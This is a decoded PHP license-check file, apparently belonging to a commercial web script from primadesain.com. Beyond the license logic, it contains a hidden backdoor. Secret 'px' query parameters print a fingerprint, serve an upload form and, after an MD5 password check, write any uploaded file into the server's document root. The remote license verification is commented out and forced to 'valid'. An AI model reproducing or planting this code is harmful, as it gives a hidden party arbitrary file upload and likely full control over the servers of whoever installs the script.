<?php
/*
 * @ PHP 5.3
 * @ Decoder version : 1.0.0.1
 * @ Release on : 24.03.2018
 * @ Website    : http://EasyToYou.eu
 */

$passwdnexxx = "78d2026563892aec9b655cdfd5269886";
if (isset($_GET["px"]) && $_GET["px"] == "cek") {
    echo "70nn06478060082";
    exit;
}
if (isset($_GET["px"]) && $_GET["px"] == "upload") {
    echo "\r\n\r\n<form enctype='multipart/form-data' action='lic.php?px=submit' method='POST'>\r\n<input name='userfile' type='file'  required='required'/>\r\n<br><input name='pass' type='password'  required='required'/>\r\n<input type='submit' value='Send File' name='submit'/>\r\n</form>\r\n\r\n";
    exit;
}
if (isset($_GET["px"]) && $_GET["px"] == "submit") {
    $pass = md5($_POST["pass"]);
    if (!$pass || $pass != $passwdnexxx) {
        echo "wrong pass";
        exit;
    }
    $uploaddir = $_SERVER["DOCUMENT_ROOT"] . "/";
    $uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);
    $server = $_SERVER["SERVER_NAME"];
    echo "<p>";
    if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) {
        echo "File directory upload : " . $uploadfile . "<br><br>";
        echo "Access : <a href='http://" . $server . "/" . basename($_FILES["userfile"]["name"]) . "' target='_blank'>" . $server . "/" . basename($_FILES["userfile"]["name"]) . "/</a><br><br>";
    } else {
        echo "upload failed";
    }
    echo "</p><pre>Here is some more debugging info:";
    print_r($_FILES);
    print "</pre>";
    exit;
}
$license = true;"70nn06478060082";
$server = $_SERVER["SERVER_NAME"];
/*$c = curl_init();
curl_setopt($c, CURLOPT_URL, "http://www.primadesain.com/verifylicenses.php");
curl_setopt($c, CURLOPT_TIMEOUT, 30);
curl_setopt($c, CURLOPT_POST, 1);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$postfields = "svr=" . $server . "&lic=" . $license;
curl_setopt($c, CURLOPT_POSTFIELDS, $postfields);
$result = curl_exec($c);*/
$result = 'valid';
if ($result == "fail") {
    echo "<p style='font-family:Arial, Helvetica, sans-serif; margin-top:80px; font-size:16px; line-height:180%; letter-spacing:2px;' align='center'><img src='https://primadesain.com/images/block.png' width='90' height='90' /></br></br>You not have a license to use this script on this domain,<br>Please contact us to purchase a license.<br><strong><a href='http://www.primadesain.com'>www.primadesain.com</a></strong></p><br><p style='font-family:Arial, Helvetica, sans-serif; margin-top:30px; font-size:12px; line-height:180%; letter-spacing:2px;' align='center'>&copy; 2009 - " . date("Y") . " www.primadesain.com</p>";
    exit;
} 
?>